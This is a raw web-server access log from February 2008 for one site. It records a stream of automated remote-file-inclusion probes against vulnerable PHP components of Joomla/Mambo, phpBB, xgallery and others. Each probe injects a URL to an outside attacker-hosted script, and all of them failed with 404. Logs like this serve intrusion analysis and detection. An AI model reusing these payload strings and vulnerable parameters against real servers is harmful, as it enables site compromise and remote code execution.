85.13.195.52 - - [12/Feb/2008:09:19:45 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:20:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:20:26 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:20:37 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.237.127.74 - - [12/Feb/2008:09:21:07 -0800] "GET /www.zveza-geodetov.sihttp://www.alexutz.as.ro/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.68.175.66 - - [12/Feb/2008:09:22:11 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://camv.escalade.free.fr//modules/cjaycontent/admin/editor2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
208.68.175.66 - - [12/Feb/2008:09:22:11 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://camv.escalade.free.fr//modules/cjaycontent/admin/editor2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:22:48 -0800] "GET /logs//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:22:48 -0800] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:22:57 -0800] "GET /str.php?p=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:22:57 -0800] "GET /logs/str.php?p=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:23:40 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:23:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:09:24:04 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:09:24:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:24:19 -0800] "GET /logs//sub.php?menu=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:24:19 -0800] "GET //sub.php?menu=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:09:25:55 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:09:26:25 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:09:26:25 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:28:42 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:28:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:09:29:10 -0800] "GET /logs/access_071221.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:29:32 -0800] "GET //codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:29:32 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:29:59 -0800] "GET //codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:09:29:59 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:30:09 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:30:10 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:30:16 -0800] "GET //codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:30:17 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:30:44 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:30:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:09:37:51 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:09:37:51 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:38:22 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:38:22 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:38:22 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.151.103.27 - - [12/Feb/2008:09:38:57 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [12/Feb/2008:09:38:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [12/Feb/2008:09:39:04 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:40:33 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:40:34 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:40:34 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.162.186 - - [12/Feb/2008:09:41:12 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://83.19.144.26/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [12/Feb/2008:09:41:12 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://83.19.144.26/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:41:14 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:41:15 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:42:12 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:42:26 -0800] "GET /errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:42:26 -0800] "GET /errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
213.190.195.100 - - [12/Feb/2008:09:42:35 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.190.195.103 - - [12/Feb/2008:09:42:35 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:43:55 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:43:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:09:43:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:44:32 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:44:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:44:32 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.232 - - [12/Feb/2008:09:45:19 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:09:48:47 -0800] "GET /logs/access_080121.log/index.php?redir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:09:48:48 -0800] "GET /index.php?redir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:09:48:49 -0800] "GET /logs/index.php?redir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [12/Feb/2008:09:53:48 -0800] "GET /logs/access_080121.log/index.php?redir=http://ecology.t35.com/Scans/safevenom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [12/Feb/2008:09:53:48 -0800] "GET /index.php?redir=http://ecology.t35.com/Scans/safevenom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [12/Feb/2008:09:53:48 -0800] "GET /logs/index.php?redir=http://ecology.t35.com/Scans/safevenom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:02 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:02 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:03 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:04 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:04 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:04 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:05 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:54:05 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:05 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:07 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:07 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:08 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:54:48 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:55:06 -0800] "GET /logs//info.php?pname=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:55:07 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:55:11 -0800] "GET //info.php?pname=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:55:59 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:56:21 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:56:22 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:56:32 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:09:57:10 -0800] "GET /logs/access_071116.log/main.php?p=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:09:57:11 -0800] "GET /main.php?p=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:09:57:11 -0800] "GET /logs/main.php?p=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:58:16 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:58:16 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:09:58:17 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [12/Feb/2008:09:58:18 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.103 - - [12/Feb/2008:09:58:30 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:59:02 -0800] "GET /logs/access_080122.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:59:02 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:09:59:03 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:59:42 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:09:59:46 -0800] "GET /logs/access_080101.log/index.php?redir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:00:15 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:10:00:18 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:00:43 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.60.207.220 - - [12/Feb/2008:10:00:49 -0800] "GET /book.php5?page=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:01:09 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:01:13 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:10:01:15 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
